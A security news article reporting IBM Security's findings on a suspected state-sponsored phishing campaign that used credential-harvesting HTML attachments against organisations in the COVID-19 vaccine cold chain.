An unknown threat actor that is likely sponsored by a nation state is believed to be behind a recent phishing campaign targeting the COVID-19 vaccine cold chain, IBM Security reported on Thursday.
The company’s researchers believe the attacks started sometime in September and evidence suggests that the attackers have targeted organizations in at least six European and Asian countries.
The targets appear to be associated with the Cold Chain Equipment Optimization Platform (CCEOP) of Gavi, the Vaccine Alliance, whose main goal is to improve access to vaccines in poor countries. The CCEOP was launched a few years ago by Gavi and its partners due to the need for temperature-controlled environments to ensure that vaccines remain cold and effective until they reach their destination.
The coronavirus pandemic and the approval of COVID-19 vaccines are leading to an increase in demand for such solutions so it’s not surprising that entities related to the CCEOP have been targeted.
The attacks observed by IBM involved phishing emails apparently coming from an executive at Haier Biomedical, a Chinese firm that is qualified for the CCEOP program and which is said to be the only complete cold chain solutions provider in the world. The phishing emails, posing as a request for quotation related to the CCEOP program, were sent to executives in IT, sales, procurement and finance departments, and in some cases to a wide range of employees within the targeted organization.
The emails contained an HTML file that instructed recipients to enter their credentials in order to view its content. By attaching the phishing page directly to an email, the attackers can reduce the risk of their phishing pages being detected and shut down.
IBM Security researchers believe that the goal of the campaign may have been to collect credentials that would give the attackers access to internal communications and information on the distribution of a COVID-19 vaccine.
Targets of the attack included the European Commission’s Directorate General for Taxation and Customs Union, which could serve as an entry point to high-value organizations across the European Union, as well as companies in the IT, energy and manufacturing sectors that could provide access to valuable information related to the distribution of a coronavirus vaccine. Targeted organizations have been notified, but it’s unclear if any of them took the bait.
“However, the established role that Haier Biomedical currently plays in vaccine transport, and their likely role in COVID-19 vaccine distribution, increases the probability the intended targets may engage with the inbound emails without questioning the sender’s authenticity,” IBM Security explained in a blog post.
IBM has not been able to definitively link the campaign to a known group, but its sophistication and targets suggest that it’s a state-sponsored operation.
“Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets,” it explained. “Likewise, insight into the transport of a vaccine may present a hot black-market commodity, however, advanced insight into the purchase and movement of a vaccine that can impact life and the global economy is likely a high-value and high-priority nation-state target.”
It would not be surprising to learn that a state-sponsored threat actor is indeed behind these attacks given the accusations made since the start of the pandemic by various countries. The US has accused China, the UK has accused Russia, and Microsoft has accused both Russia and North Korea of targeting vaccine research.
Related: Kremlin Denies UK Claims of Vote Meddling, Vaccine Hacking
Related: Russia Denies Microsoft Claims of Healthcare Cyber Attacks
Related: China Accuses US of ‘Slander’ Over Coronavirus Research Hacking Claims

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
More from Eduard Kovacs
- Microsoft’s Verified Publisher Status Abused in Email Theft Campaign
- British Retailer JD Sports Discloses Data Breach Affecting 10 Million Customers
- Meta Awards $27,000 Bounty for 2FA Bypass Vulnerability
- Industry Reactions to Hive Ransomware Takedown: Feedback Friday
- US Reiterates $10 Million Reward Offer After Disruption of Hive Ransomware
- Hive Ransomware Operation Shut Down by Law Enforcement
- UK Gov Warns of Phishing Attacks Launched by Iranian, Russian Cyberspies
- Dozens of Cybersecurity Companies Announced Layoffs in Past Year
Latest News
- Sentra Raises $30 Million for DSPM Technology
- Cyber Insights 2023: Cyberinsurance
- Cyber Insights 2023: Attack Surface Management
- Cyber Insights 2023: Artificial Intelligence
- Microsoft’s Verified Publisher Status Abused in Email Theft Campaign
- Guardz Emerges From Stealth Mode With $10 Million in Funding
- How the Atomized Network Changed Enterprise Protection
- Critical QNAP Vulnerability Leads to Code Injection
